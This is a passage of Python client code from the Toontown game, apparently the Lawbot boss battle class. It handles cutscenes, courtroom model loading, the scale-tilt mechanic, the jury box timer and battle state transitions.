ToontownGlobals.LawbotBossBattleTwoPosHpr[2]) battlePos = Point3(ToontownGlobals.LawbotBossBattleThreePosHpr[0], ToontownGlobals.LawbotBossBattleThreePosHpr[1], ToontownGlobals.LawbotBossBattleThreePosHpr[2]) battleHpr = VBase3(ToontownGlobals.LawbotBossBattleThreePosHpr[3], ToontownGlobals.LawbotBossBattleThreePosHpr[4], ToontownGlobals.LawbotBossBattleThreePosHpr[5]) bossTrack = Sequence() myInterval = camera.posHprInterval(8, Point3(-22, -100, 35), Point3(-10, -13, 0), startPos=Point3(-22, -90, 35), startHpr=Point3(-10, -13, 0), blendType='easeInOut') chatTrack = Sequence(Func(self.setChatAbsolute, TTLocalizer.LawbotBossTrialChat1, CFSpeech), Func(camera.reparentTo, localAvatar), Func(camera.setPos, localAvatar.getOldCameraPos()), Func(camera.setHpr, 0, 0, 0), Func(self.releaseToons, 1)) bossTrack.append(Func(self.getGeomNode().setH, 180)) bossTrack.append(Func(self.loop, 'Ff_neutral')) track, hpr = self.rollBossToPoint(startPos, None, battlePos, None, 0) bossTrack.append(track) track, hpr = self.rollBossToPoint(battlePos, hpr, battlePos, battleHpr, 0) self.makeToonsWait() return Sequence(chatTrack, bossTrack, Func(self.getGeomNode().setH, 0), name=self.uniqueName('BattleTwoMovie')) def toNeutralMode(self): if self.cr: place = self.cr.playGame.getPlace() if place and hasattr(place, 'fsm'): place.setState('waitForBattle') def makeToonsWait(self): self.notify.debug('makeToonsWait') for toonId in self.involvedToons: toon = self.cr.doId2do.get(toonId) if toon: toon.stopLookAround() toon.stopSmooth() if self.hasLocalToon(): self.toMovieMode() for toonId in self.involvedToons: toon = self.cr.doId2do.get(toonId) if toon: toon.loop('neutral') def makeEndOfBattleMovie(self, hasLocalToon): name = self.uniqueName('Drop') seq = Sequence(name=name) seq += [Wait(0.0)] if hasLocalToon: seq += [Func(self.show), Func(camera.reparentTo, localAvatar), Func(camera.setPos, localAvatar.getOldCameraPos()), Func(camera.setHpr, 0, 0, 0)] seq.append(Func(self.setChatAbsolute, TTLocalizer.LawbotBossPassExam, CFSpeech)) seq.append(Wait(5.0)) seq.append(Func(self.clearChat)) return seq def __makeBossDamageMovie(self): self.notify.debug('---- __makeBossDamageMovie') startPos = Point3(ToontownGlobals.LawbotBossBattleThreePosHpr[0], ToontownGlobals.LawbotBossBattleThreePosHpr[1], ToontownGlobals.LawbotBossBattleThreePosHpr[2]) startHpr = Point3(*ToontownGlobals.LawbotBossBattleThreeHpr) bottomPos = Point3(*ToontownGlobals.LawbotBossBottomPos) deathPos = Point3(*ToontownGlobals.LawbotBossDeathPos) self.setPosHpr(startPos, startHpr) bossTrack = Sequence() bossTrack.append(Func(self.loop, 'Ff_neutral')) track, hpr = self.rollBossToPoint(startPos, startHpr, bottomPos, None, 1) bossTrack.append(track) track, hpr = self.rollBossToPoint(bottomPos, startHpr, deathPos, None, 1) bossTrack.append(track) duration = bossTrack.getDuration() return bossTrack def __showOnscreenMessage(self, text): self.notify.debug('----- __showOnscreenmessage') if self.onscreenMessage: self.onscreenMessage.destroy() self.onscreenMessage = None self.onscreenMessage = DirectLabel(text=text, text_fg=VBase4(1, 1, 1, 1), text_align=TextNode.ACenter, relief=None, pos=(0, 0, 0.35), scale=0.1) return def __clearOnscreenMessage(self): if self.onscreenMessage: self.onscreenMessage.destroy() self.onscreenMessage = None return def __showWaitingMessage(self, task): self.notify.debug('----- __showWaitingMessage') self.__showOnscreenMessage(TTLocalizer.BuildingWaitingForVictors) def loadEnvironment(self): self.notify.debug('----- loadEnvironment') DistributedBossCog.DistributedBossCog.loadEnvironment(self) self.geom = loader.loadModel('phase_11/models/lawbotHQ/LawbotCourtroom3') self.geom.setPos(0, 0, -71.601) self.geom.setScale(1) self.elevatorEntrance = self.geom.find('**/elevator_origin') self.elevatorEntrance.getChildren().detach() self.elevatorEntrance.setScale(1) elevatorModel = loader.loadModel('phase_11/models/lawbotHQ/LB_Elevator') elevatorModel.reparentTo(self.elevatorEntrance) self.setupElevator(elevatorModel) self.promotionMusic = base.loader.loadMusic('phase_7/audio/bgm/encntr_suit_winning_indoor.ogg') self.betweenBattleMusic = base.loader.loadMusic('phase_9/audio/bgm/encntr_toon_winning.ogg') self.battleTwoMusic = base.loader.loadMusic('phase_11/audio/bgm/LB_juryBG.ogg') floor = self.geom.find('**/MidVaultFloor1') if floor.isEmpty(): floor = self.geom.find('**/CR3_Floor') self.evFloor = self.replaceCollisionPolysWithPlanes(floor) self.evFloor.reparentTo(self.geom) self.evFloor.setName('floor') plane = CollisionPlane(Plane(Vec3(0, 0, 1), Point3(0, 0, -50))) planeNode = CollisionNode('dropPlane') planeNode.addSolid(plane) planeNode.setCollideMask(ToontownGlobals.PieBitmask) self.geom.attachNewNode(planeNode) self.door3 = self.geom.find('**/SlidingDoor1/') if self.door3.isEmpty(): self.door3 = self.geom.find('**/interior/CR3_Door') self.mainDoor = self.geom.find('**/Door_1') if not self.mainDoor.isEmpty(): itemsToHide = ['interior/Door_1'] for str in itemsToHide: stuffToHide = self.geom.find('**/%s' % str) if not stuffToHide.isEmpty(): self.notify.debug('found %s' % stuffToHide) stuffToHide.wrtReparentTo(self.mainDoor) else: self.notify.debug('not found %s' % stuffToHide) self.reflectedMainDoor = self.geom.find('**/interiorrefl/CR3_Door') if not self.reflectedMainDoor.isEmpty(): itemsToHide = ['Reflections/Door_1'] for str in itemsToHide: stuffToHide = self.geom.find('**/%s' % str) if not stuffToHide.isEmpty(): self.notify.debug('found %s' % stuffToHide) stuffToHide.wrtReparentTo(self.reflectedMainDoor) else: self.notify.debug('not found %s' % stuffToHide) self.geom.reparentTo(render) self.loadWitnessStand() self.loadScale() self.scaleNodePath.stash() self.loadJuryBox() self.loadPodium() ug = self.geom.find('**/Reflections') ug.setBin('ground', -10) def loadJuryBox(self): self.juryBox = self.geom.find('**/JuryBox') juryBoxPos = self.juryBox.getPos() newPos = juryBoxPos - Point3(*ToontownGlobals.LawbotBossJuryBoxRelativeEndPos) if not self.debugPositions: self.juryBox.setPos(newPos) self.reflectedJuryBox = self.geom.find('**/JuryBox_Geo_Reflect') reflectedJuryBoxPos = self.reflectedJuryBox.getPos() newReflectedPos = reflectedJuryBoxPos - Point3(*ToontownGlobals.LawbotBossJuryBoxRelativeEndPos) if not self.debugPositions: self.reflectedJuryBox.setPos(newReflectedPos) if not self.reflectedJuryBox.isEmpty(): if self.debugPositions: self.reflectedJuryBox.show() self.reflectedJuryBox.setZ(self.reflectedJuryBox.getZ() + ToontownGlobals.LawbotBossJuryBoxRelativeEndPos[2]) def loadPodium(self): self.podium = self.geom.find('**/Podium') newZ = self.podium.getZ() - ToontownGlobals.LawbotBossBattleTwoPosHpr[2] if not self.debugPositions: self.podium.setZ(newZ) self.reflectedPodium = self.geom.find('**/Podium_Geo1_Refl') reflectedZ = self.reflectedPodium.getZ() if not self.debugPositions: self.reflectedPodium.setZ(reflectedZ) if not self.reflectedPodium.isEmpty(): if self.debugPositions: self.reflectedPodium.show() def loadCannons(self): pass def loadWitnessStand(self): self.realWitnessStand = self.geom.find('**/WitnessStand') if not self.realWitnessStand.isEmpty(): pass self.reflectedWitnessStand = self.geom.find('**/Witnessstand_Geo_Reflect') if not self.reflectedWitnessStand.isEmpty(): pass colNode = self.realWitnessStand.find('**/witnessStandCollisions/Witnessstand_Collision') colNode.setName('WitnessStand') def loadScale(self): self.useProgrammerScale = base.config.GetBool('want-injustice-scale-debug', 0) if self.useProgrammerScale: self.loadScaleOld() else: self.loadScaleNew() def __debugScale(self): prosecutionPanPos = self.prosecutionPanNodePath.getPos() origin = Point3(0, 0, 0) prosecutionPanRelPos = self.scaleNodePath.getRelativePoint(self.prosecutionPanNodePath, origin) panRenderPos = render.getRelativePoint(self.prosecutionPanNodePath, origin) self.notify.debug('prosecutionPanPos = %s' % prosecutionPanPos) self.notify.debug('prosecutionPanRelPos = %s' % prosecutionPanRelPos) self.notify.debug('panRenderPos = %s' % panRenderPos) prosecutionLocatorPos = self.prosecutionLocator.getPos() prosecutionLocatorRelPos = self.scaleNodePath.getRelativePoint(self.prosecutionLocator, origin) locatorRenderPos = render.getRelativePoint(self.prosecutionLocator, origin) self.notify.debug('prosecutionLocatorPos = %s ' % prosecutionLocatorPos) self.notify.debug('prosecutionLocatorRelPos = %s ' % prosecutionLocatorRelPos) self.notify.debug('locatorRenderPos = %s' % locatorRenderPos) beamPos = self.beamNodePath.getPos() beamRelPos = self.scaleNodePath.getRelativePoint(self.beamNodePath, origin) beamRenderPos = render.getRelativePoint(self.beamNodePath, origin) self.notify.debug('beamPos = %s' % beamPos) self.notify.debug('beamRelPos = %s' % beamRelPos) self.notify.debug('beamRenderPos = %s' % beamRenderPos) beamBoundsCenter = self.beamNodePath.getBounds().getCenter() self.notify.debug('beamBoundsCenter = %s' % beamBoundsCenter) beamLocatorBounds = self.beamLocator.getBounds() beamLocatorPos = beamLocatorBounds.getCenter() self.notify.debug('beamLocatorPos = %s' % beamLocatorPos) def loadScaleNew(self): self.scaleNodePath = loader.loadModel('phase_11/models/lawbotHQ/scale') self.beamNodePath = self.scaleNodePath.find('**/scaleBeam') self.defensePanNodePath = self.scaleNodePath.find('**/defensePan') self.prosecutionPanNodePath = self.scaleNodePath.find('**/prosecutionPan') self.defenseColNodePath = self.scaleNodePath.find('**/DefenseCol') self.defenseColNodePath.setTag('pieCode', str(ToontownGlobals.PieCodeDefensePan)) self.prosecutionColNodePath = self.scaleNodePath.find('**/ProsecutionCol') self.prosecutionColNodePath.setTag('pieCode', str(ToontownGlobals.PieCodeProsecutionPan)) self.standNodePath = self.scaleNodePath.find('**/scaleStand') self.scaleNodePath.setPosHpr(*ToontownGlobals.LawbotBossInjusticePosHpr) self.defenseLocator = self.scaleNodePath.find('**/DefenseLocator') defenseLocBounds = self.defenseLocator.getBounds() defenseLocPos = defenseLocBounds.getCenter() self.notify.debug('defenseLocatorPos = %s' % defenseLocPos) self.defensePanNodePath.setPos(defenseLocPos) self.defensePanNodePath.reparentTo(self.beamNodePath) self.notify.debug('defensePanNodePath.getPos()=%s' % self.defensePanNodePath.getPos()) self.prosecutionLocator = self.scaleNodePath.find('**/ProsecutionLocator') prosecutionLocBounds = self.prosecutionLocator.getBounds() prosecutionLocPos = prosecutionLocBounds.getCenter() self.notify.debug('prosecutionLocatorPos = %s' % prosecutionLocPos) self.prosecutionPanNodePath.setPos(prosecutionLocPos) self.prosecutionPanNodePath.reparentTo(self.beamNodePath) self.beamLocator = self.scaleNodePath.find('**/StandLocator1') beamLocatorBounds = self.beamLocator.getBounds() beamLocatorPos = beamLocatorBounds.getCenter() negBeamLocatorPos = -beamLocatorPos self.notify.debug('beamLocatorPos = %s' % beamLocatorPos) self.notify.debug('negBeamLocatorPos = %s' % negBeamLocatorPos) self.beamNodePath.setPos(beamLocatorPos) self.scaleNodePath.setScale(*ToontownGlobals.LawbotBossInjusticeScale) self.scaleNodePath.wrtReparentTo(self.geom) self.baseHighCol = self.scaleNodePath.find('**/BaseHighCol') oldBitMask = self.baseHighCol.getCollideMask() newBitMask = oldBitMask & ~ToontownGlobals.PieBitmask newBitMask = newBitMask & ~ToontownGlobals.CameraBitmask self.baseHighCol.setCollideMask(newBitMask) self.defenseHighCol = self.scaleNodePath.find('**/DefenseHighCol') self.defenseHighCol.stash() self.defenseHighCol.setCollideMask(newBitMask) self.baseTopCol = self.scaleNodePath.find('**/Scale_base_top_collision') self.baseSideCol = self.scaleNodePath.find('**/Scale_base_side_col') self.defenseLocator.hide() self.prosecutionLocator.hide() self.beamLocator.hide() def loadScaleOld(self): startingTilt = 0 self.scaleNodePath = NodePath('injusticeScale') beamGeom = self.createBlock(0.25, 2, 0.125, -0.25, -2, -0.125, 0, 1.0, 0, 1.0) self.beamNodePath = NodePath('scaleBeam') self.beamNodePath.attachNewNode(beamGeom) self.beamNodePath.setPos(0, 0, 3) self.beamNodePath.reparentTo(self.scaleNodePath) defensePanGeom = self.createBlock(0.5, 0.5, 0, -0.5, -0.5, -2, 0, 0, 1.0, 0.25) self.defensePanNodePath = NodePath('defensePan') self.defensePanNodePath.attachNewNode(defensePanGeom) self.defensePanNodePath.setPos(0, -2, 0) self.defensePanNodePath.reparentTo(self.beamNodePath) defenseTube = CollisionTube(0, 0, -0.5, 0, 0, -1.5, 0.6) defenseTube.setTangible(1) defenseCollNode = CollisionNode('DefenseCol') defenseCollNode.addSolid(defenseTube) self.defenseColNodePath = self.defensePanNodePath.attachNewNode(defenseCollNode) self.defenseColNodePath.setTag('pieCode', str(ToontownGlobals.PieCodeDefensePan)) prosecutionPanGeom = self.createBlock(0.5, 0.5, 0, -0.5, -0.5, -2, 1.0, 0, 0, 1.0) self.prosecutionPanNodePath = NodePath('prosecutionPan') self.prosecutionPanNodePath.attachNewNode(prosecutionPanGeom) self.prosecutionPanNodePath.setPos(0, 2, 0) self.prosecutionPanNodePath.reparentTo(self.beamNodePath) prosecutionTube = CollisionTube(0, 0, -0.5, 0, 0, -1.5, 0.6) prosecutionTube.setTangible(1) prosecutionCollNode = CollisionNode(self.uniqueName('ProsecutionCol')) prosecutionCollNode.addSolid(prosecutionTube) self.prosecutionColNodePath = self.prosecutionPanNodePath.attachNewNode(prosecutionCollNode) self.prosecutionColNodePath.setTag('pieCode', str(ToontownGlobals.PieCodeProsecutionPan)) standGeom = self.createBlock(0.25, 0.25, 0, -0.25, -0.25, 3) self.standNodePath = NodePath('scaleStand') self.standNodePath.attachNewNode(standGeom) self.standNodePath.reparentTo(self.scaleNodePath) self.scaleNodePath.setPosHpr(*ToontownGlobals.LawbotBossInjusticePosHpr) self.scaleNodePath.setScale(5.0) self.scaleNodePath.wrtReparentTo(self.geom) self.setScaleTilt(startingTilt) def setScaleTilt(self, tilt): self.beamNodePath.setP(tilt) if self.useProgrammerScale: self.defensePanNodePath.setP(-tilt) self.prosecutionPanNodePath.setP(-tilt) else: self.defensePanNodePath.setP(-tilt) self.prosecutionPanNodePath.setP(-tilt) def stashBaseCol(self): if not self.baseColStashed: self.notify.debug('stashBaseCol') self.baseTopCol.stash() self.baseSideCol.stash() self.baseColStashed = True def unstashBaseCol(self): if self.baseColStashed: self.notify.debug('unstashBaseCol') self.baseTopCol.unstash() self.baseSideCol.unstash() self.baseColStashed = False def makeScaleReflectDamage(self): diffDamage = self.bossDamage - ToontownGlobals.LawbotBossInitialDamage diffDamage *= 1.0 if diffDamage >= 0: percentDamaged = diffDamage / (ToontownGlobals.LawbotBossMaxDamage - ToontownGlobals.LawbotBossInitialDamage) tilt = percentDamaged * ToontownGlobals.LawbotBossWinningTilt else: percentDamaged = diffDamage / (ToontownGlobals.LawbotBossInitialDamage - 0) tilt = percentDamaged * ToontownGlobals.LawbotBossWinningTilt self.setScaleTilt(tilt) if self.bossDamage < ToontownGlobals.LawbotBossMaxDamage * 0.85: self.unstashBaseCol() else: self.stashBaseCol() def unloadEnvironment(self): self.notify.debug('----- unloadEnvironment') DistributedBossCog.DistributedBossCog.unloadEnvironment(self) self.geom.removeNode() del self.geom def __loadMopaths(self): self.notify.debug('----- __loadMopaths') self.toonsEnterA = Mopath.Mopath() self.toonsEnterA.loadFile('phase_9/paths/bossBattle-toonsEnterA') self.toonsEnterA.fFaceForward = 1 self.toonsEnterA.timeScale = 35 self.toonsEnterB = Mopath.Mopath() self.toonsEnterB.loadFile('phase_9/paths/bossBattle-toonsEnterB') self.toonsEnterB.fFaceForward = 1 self.toonsEnterB.timeScale = 35 def __unloadMopaths(self): self.notify.debug('----- __unloadMopaths') self.toonsEnterA.reset() self.toonsEnterB.reset() def enterOff(self): self.notify.debug('----- enterOff') DistributedBossCog.DistributedBossCog.enterOff(self) if self.witnessToon: self.witnessToon.clearChat() def enterWaitForToons(self): self.notify.debug('----- enterWaitForToons') DistributedBossCog.DistributedBossCog.enterWaitForToons(self) self.geom.hide() self.witnessToon.removeActive() def exitWaitForToons(self): self.notify.debug('----- exitWaitForToons') DistributedBossCog.DistributedBossCog.exitWaitForToons(self) self.geom.show() self.witnessToon.addActive() def enterElevator(self): self.notify.debug('----- enterElevator') DistributedBossCog.DistributedBossCog.enterElevator(self) self.witnessToon.removeActive() self.reparentTo(render) self.setPosHpr(*ToontownGlobals.LawbotBossBattleOnePosHpr) self.happy = 1 self.raised = 1 self.forward = 1 self.doAnimate() self.__hideWitnessToon() if not self.mainDoor.isEmpty(): self.mainDoor.stash() if not self.reflectedMainDoor.isEmpty(): self.reflectedMainDoor.stash() camera.reparentTo(self.elevatorModel) camera.setPosHpr(0, 30, 8, 180, 0, 0) def exitElevator(self): self.notify.debug('----- exitElevator') DistributedBossCog.DistributedBossCog.exitElevator(self) self.witnessToon.removeActive() def enterIntroduction(self): self.notify.debug('----- enterIntroduction') self.reparentTo(render) self.setPosHpr(*ToontownGlobals.LawbotBossBattleOnePosHpr) self.stopAnimate() self.__hideWitnessToon() DistributedBossCog.DistributedBossCog.enterIntroduction(self) base.playMusic(self.promotionMusic, looping=1, volume=0.9) if not self.mainDoor.isEmpty(): self.mainDoor.stash() if not self.reflectedMainDoor.isEmpty(): self.reflectedMainDoor.stash() def exitIntroduction(self): self.notify.debug('----- exitIntroduction') DistributedBossCog.DistributedBossCog.exitIntroduction(self) self.promotionMusic.stop() if not self.mainDoor.isEmpty(): pass if not self.reflectedMainDoor.isEmpty(): self.reflectedMainDoor.unstash() if not self.elevatorEntrance.isEmpty(): pass def enterBattleOne(self): self.notify.debug('----- LawbotBoss.enterBattleOne ') DistributedBossCog.DistributedBossCog.enterBattleOne(self) self.reparentTo(render) self.setPosHpr(*ToontownGlobals.LawbotBossBattleOnePosHpr) self.clearChat() self.loop('Ff_neutral') self.notify.debug('self.battleANode = %s' % self.battleANode) self.__hideWitnessToon() if self.battleA == None or self.battleB == None: pass return def exitBattleOne(self): self.notify.debug('----- exitBattleOne') DistributedBossCog.DistributedBossCog.exitBattleOne(self) def stashBoss(self): self.stash() def unstashBoss(self, task): self.unstash() self.reparentTo(render) def enterRollToBattleTwo(self): self.notify.debug('----- enterRollToBattleTwo') self.releaseToons(finalBattle=1) self.stashBoss() self.toonsToBattlePosition(self.involvedToons, self.battleANode) self.stickBossToFloor() intervalName = 'RollToBattleTwo' seq = Sequence(self.__makeRollToBattleTwoMovie(), Func(self.__onToPrepareBattleTwo), name=intervalName) seq.start() self.storeInterval(seq, intervalName) base.playMusic(self.betweenBattleMusic, looping=1, volume=0.9) taskMgr.doMethodLater(0.01, self.unstashBoss, 'unstashBoss') def __onToPrepareBattleTwo(self): self.notify.debug('----- __onToPrepareBattleTwo') self.unstickBoss() self.setPosHpr(*ToontownGlobals.LawbotBossBattleTwoPosHpr) self.doneBarrier('RollToBattleTwo') def exitRollToBattleTwo(self): self.notify.debug('----- exitRollToBattleTwo') self.unstickBoss() intervalName = 'RollToBattleTwo' self.clearInterval(intervalName) self.betweenBattleMusic.stop() def enterPrepareBattleTwo(self): self.notify.debug('----- enterPrepareBattleTwo') self.cleanupIntervals() self.controlToons() self.setToonsToNeutral(self.involvedToons) self.clearChat() self.reparentTo(render) self.__showWitnessToon() prepareBattleTwoMovie = self.__makePrepareBattleTwoMovie() intervalName = 'prepareBattleTwo' seq = Sequence(prepareBattleTwoMovie, name=intervalName) seq.start() self.storeInterval(seq, intervalName) self.acceptOnce('doneChatPage', self.__showCannonsAppearing) base.playMusic(self.stingMusic, looping=0, volume=1.0) def __showCannonsAppearing(self, elapsedTime = 0): allCannonsAppear = Sequence(Func(self.__positionToonsInFrontOfCannons), Func(camera.reparentTo, localAvatar), Func(camera.setPos, localAvatar.getOldCameraPosTwo()), Func(camera.lookAt, localAvatar)) multiCannons = Parallel() index = 0 self.involvedToons.sort() for toonId in self.involvedToons: toon = self.cr.doId2do.get(toonId) if toon: if index in self.cannons: cannon = self.cannons[index] cannonSeq = cannon.generateCannonAppearTrack(toon) multiCannons.append(cannonSeq) index += 1 else: self.notify.warning('No cannon %d but we have a toon =%d' % (index, toonId)) allCannonsAppear.append(multiCannons) intervalName = 'prepareBattleTwoCannonsAppear' seq = Sequence(allCannonsAppear, Func(self.__onToBattleTwo), name=intervalName) seq.start() self.storeInterval(seq, intervalName) def __onToBattleTwo(self, elapsedTime = 0): self.notify.debug('----- __onToBattleTwo') self.doneBarrier('PrepareBattleTwo') taskMgr.doMethodLater(1, self.__showWaitingMessage, self.uniqueName('WaitingMessage')) def exitPrepareBattleTwo(self): self.notify.debug('----- exitPrepareBattleTwo') self.show() taskMgr.remove(self.uniqueName('WaitingMessage')) self.ignore('doneChatPage') self.__clearOnscreenMessage() self.stingMusic.stop() def enterBattleTwo(self): self.notify.debug('----- enterBattleTwo') self.cleanupIntervals() mult = ToontownBattleGlobals.getBossBattleCreditMultiplier(2) localAvatar.inventory.setBattleCreditMultiplier(mult) self.reparentTo(render) self.setPosHpr(*ToontownGlobals.LawbotBossBattleTwoPosHpr) self.clearChat() self.witnessToon.clearChat() self.releaseToons(finalBattle=1) self.__showWitnessToon() if not self.useCannons: self.toonsToBattlePosition(self.toonsA, self.battleANode) self.toonsToBattlePosition(self.toonsB, self.battleBNode) base.playMusic(self.battleTwoMusic, looping=1, volume=0.9) self.startJuryBoxMoving() for index in xrange(len(self.cannons)): cannon = self.cannons[index] cannon.cannon.show() def getChairParent(self): return self.juryBox def startJuryBoxMoving(self): if self.juryBoxIval: self.juryBoxIval.finish() self.juryBoxIval = None self.juryBox.setPos(-30, 0, -12.645) self.reflectedJuryBox.setPos(-30, 0, 0) curPos = self.juryBox.getPos() endingAbsPos = Point3(curPos[0] + ToontownGlobals.LawbotBossJuryBoxRelativeEndPos[0], curPos[1] + ToontownGlobals.LawbotBossJuryBoxRelativeEndPos[1], curPos[2] + ToontownGlobals.LawbotBossJuryBoxRelativeEndPos[2]) curReflectedPos = self.reflectedJuryBox.getPos() reflectedEndingAbsPos = Point3(curReflectedPos[0] + ToontownGlobals.LawbotBossJuryBoxRelativeEndPos[0], curReflectedPos[1] + ToontownGlobals.LawbotBossJuryBoxRelativeEndPos[1], curReflectedPos[2] + ToontownGlobals.LawbotBossJuryBoxRelativeEndPos[2]) self.juryBoxIval = Parallel(self.juryBox.posInterval(ToontownGlobals.LawbotBossJuryBoxMoveTime, endingAbsPos), self.reflectedJuryBox.posInterval(ToontownGlobals.LawbotBossJuryBoxMoveTime, reflectedEndingAbsPos), SoundInterval(self.juryMovesSfx, node=self.chairs[2].nodePath, duration=ToontownGlobals.LawbotBossJuryBoxMoveTime, loop=1, volume=1.0)) self.juryBoxIval.start() self.juryTimer = ToontownTimer.ToontownTimer() self.juryTimer.posInTopRightCorner() self.juryTimer.countdown(ToontownGlobals.LawbotBossJuryBoxMoveTime) def exitBattleTwo(self): self.notify.debug('----- exitBattleTwo') intervalName = self.uniqueName('Drop') self.clearInterval(intervalName) self.cleanupBattles() self.battleTwoMusic.stop() localAvatar.inventory.setBattleCreditMultiplier(1) if self.juryTimer: self.juryTimer.destroy() del self.juryTimer self.juryTimer = None for chair in self.chairs.values(): chair.stopCogsFlying() return def enterRollToBattleThree(self): self.notify.debug('----- enterRollToBattleThree') self.reparentTo(render) self.stickBossToFloor() intervalName = 'RollToBattleThree' seq = Sequence(self.__makeRollToBattleThreeMovie(), Func(self.__onToPrepareBattleThree), name=intervalName) seq.start() self.storeInterval(seq, intervalName) base.playMusic(self.betweenBattleMusic, looping=1, volume=0.9) def __onToPrepareBattleThree(self): self.notify.debug('----- __onToPrepareBattleThree') self.unstickBoss() self.setPosHpr(*ToontownGlobals.LawbotBossBattleThreePosHpr) self.doneBarrier('RollToBattleThree') def exitRollToBattleThree(self): self.notify.debug('----- exitRollToBattleThree') self.unstickBoss() intervalName = 'RollToBattleThree' self.clearInterval(intervalName) self.betweenBattleMusic.stop() def enterPrepareBattleThree(self): self.notify.debug('----- enterPrepareBattleThree') self.cleanupIntervals() self.controlToons() self.setToonsToNeutral(self.involvedToons) self.clearChat() self.reparentTo(render) base.playMusic(self.betweenBattleMusic, looping=1, volume=0.9) self.__showWitnessToon() prepareBattleThreeMovie = self.__makePrepareBattleThreeMovie() self.acceptOnce('doneChatPage', self.__onToBattleThree) intervalName = 'prepareBattleThree' seq = Sequence(prepareBattleThreeMovie, name=intervalName) seq.start() self.storeInterval(seq, intervalName) def __onToBattleThree(self, elapsed): self.notify.debug('----- __onToBattleThree') self.doneBarrier('PrepareBattleThree') taskMgr.doMethodLater(1, self.__showWaitingMessage, self.uniqueName('WaitingMessage')) def exitPrepareBattleThree(self): self.notify.debug('----- exitPrepareBattleThree') self.show() taskMgr.remove(self.uniqueName('WaitingMessage')) self.ignore('doneChatPage') intervalName = 'PrepareBattleThree' self.clearInterval(intervalName) self.__clearOnscreenMessage() self.betweenBattleMusic.stop() def enterBattleThree(self): DistributedBossCog.DistributedBossCog.enterBattleThree(self) self.scaleNodePath.unstash() localAvatar.setPos(-3, 0, 0) base.localAvatar.orbitalCamera.start() self.clearChat() self.witnessToon.clearChat() self.reparentTo(render) self.happy = 1 self.raised = 1 self.forward = 1 self.doAnimate() self.accept('enterWitnessStand', self.__touchedWitnessStand) self.accept('pieSplat', self.__pieSplat) self.accept('localPieSplat', self.__localPieSplat) self.accept('outOfPies', self.__outOfPies) self.accept('begin-pie', self.__foundPieButton) self.accept('enterDefenseCol', self.__enterDefenseCol) self.accept('enterProsecutionCol', self.__enterProsecutionCol) localAvatar.setCameraFov(ToontownGlobals.BossBattleCameraFov) taskMgr.doMethodLater(30, self.__howToGetPies, self.uniqueName('PieAdvice')) self.stickBossToFloor() self.setPosHpr(*ToontownGlobals.LawbotBossBattleThreePosHpr) self.bossMaxDamage = ToontownGlobals.LawbotBossMaxDamage base.playMusic(self.battleThreeMusic, looping=1, volume=0.9) self.__showWitnessToon() diffSettings = ToontownGlobals.LawbotBossDifficultySettings[self.battleDifficulty] self.bossHealthBar.initialize(self.bossMaxDamage - self.bossDamage, self.bossMaxDamage) if diffSettings[4]: localAvatar.chatMgr.chatInputSpeedChat.removeCJMenu() localAvatar.chatMgr.chatInputSpeedChat.addCJMenu(self.bonusWeight) def __doneBattleThree(self): self.notify.debug('----- __doneBattleThree') self.setState('NearVictory') self.unstickBoss() def exitBattleThree(self): self.notify.debug('----- exitBattleThree') DistributedBossCog.DistributedBossCog.exitBattleThree(self) NametagGlobals.setMasterArrowsOn(1) bossDoneEventName = self.uniqueName('DestroyedBoss') self.ignore(bossDoneEventName) taskMgr.remove(self.uniqueName('StandUp')) self.ignore('enterWitnessStand') self.ignore('pieSplat') self.ignore('localPieSplat') self.ignore('outOfPies') self.ignore('begin-pie') self.ignore('enterDefenseCol') self.ignore('enterProsecutionCol') self.__clearOnscreenMessage() taskMgr.remove(self.uniqueName('PieAdvice')) localAvatar.setCameraFov(ToontownGlobals.CogHQCameraFov) if self.bossDamageMovie: self.bossDamageMovie.finish() self.bossDamageMovie = None self.unstickBoss() taskName = 'RecoverBossDamage' taskMgr.remove(taskName) self.battleThreeMusicTime = self.battleThreeMusic.getTime() self.battleThreeMusic.stop() return def enterNearVictory(self): self.cleanupIntervals() self.reparentTo(render) self.setPos(*ToontownGlobals.LawbotBossDeathPos) self.setHpr(*ToontownGlobals.LawbotBossBattleThreeHpr) self.clearChat() self.releaseToons(finalBattle=1) self.accept('pieSplat', self.__finalPieSplat) self.accept('localPieSplat', self.__localPieSplat) self.accept('outOfPies', self.__outOfPies) localAvatar.setCameraFov(ToontownGlobals.BossBattleCameraFov) self.happy = 0 self.raised = 0 self.forward = 1 self.doAnimate() self.setDizzy(1) base.playMusic(self.battleThreeMusic, looping=1, volume=0.9, time=self.battleThreeMusicTime) def exitNearVictory(self): self.notify.debug('----- exitNearVictory') self.ignore('pieSplat') self.ignore('localPieSplat') self.ignore('outOfPies') self.__clearOnscreenMessage() taskMgr.remove(self.uniqueName('PieAdvice')) localAvatar.setCameraFov(ToontownGlobals.CogHQCameraFov) self.setDizzy(0) self.battleThreeMusicTime = self.battleThreeMusic.getTime() self.battleThreeMusic.stop() def enterVictory(self): self.notify.debug('----- enterVictory') self.cleanupIntervals() self.reparentTo(render) self.setPosHpr(*ToontownGlobals.LawbotBossBattleThreePosHpr) self.loop('neutral') localAvatar.setCameraFov(ToontownGlobals.BossBattleCameraFov) self.clearChat() self.witnessToon.clearChat() self.controlToons() self.setToonsToNeutral(self.involvedToons) self.happy = 1 self.raised = 1 self.forward = 1 intervalName = 'VictoryMovie' seq = Sequence(self.makeVictoryMovie(), Func(self.__continueVictory), name=intervalName) seq.start() self.storeInterval(seq, intervalName) self.bossHealthBar.deinitialize() base.playMusic(self.battleThreeMusic, looping=1, volume=0.9, time=self.battleThreeMusicTime) def __continueVictory(self): self.notify.debug('----- __continueVictory') self.stopAnimate() self.doneBarrier('Victory') def exitVictory(self): self.notify.debug('----- exitVictory') self.stopAnimate() self.unstash() localAvatar.setCameraFov(ToontownGlobals.CogHQCameraFov) self.battleThreeMusicTime = self.battleThreeMusic.getTime() self.battleThreeMusic.stop() def enterDefeat(self): self.notify.debug('----- enterDefeat') self.cleanupIntervals() localAvatar.setCameraFov(ToontownGlobals.BossBattleCameraFov) self.reparentTo(render) self.clearChat() self.releaseToons(finalBattle=1) self.happy = 0 self.raised = 0 self.forward = 1 intervalName = 'DefeatMovie' seq = Sequence(self.makeDefeatMovie(), Func(self.__continueDefeat), name=intervalName) seq.start() self.storeInterval(seq, intervalName) base.playMusic(self.battleThreeMusic, looping=1, volume=0.9, time=self.battleThreeMusicTime) def __continueDefeat(self): self.notify.debug('----- __continueDefeat') self.stopAnimate() self.doneBarrier('Defeat') def exitDefeat(self): self.notify.debug('----- exitDefeat') self.stopAnimate() self.unstash() localAvatar.setCameraFov(ToontownGlobals.CogHQCameraFov) 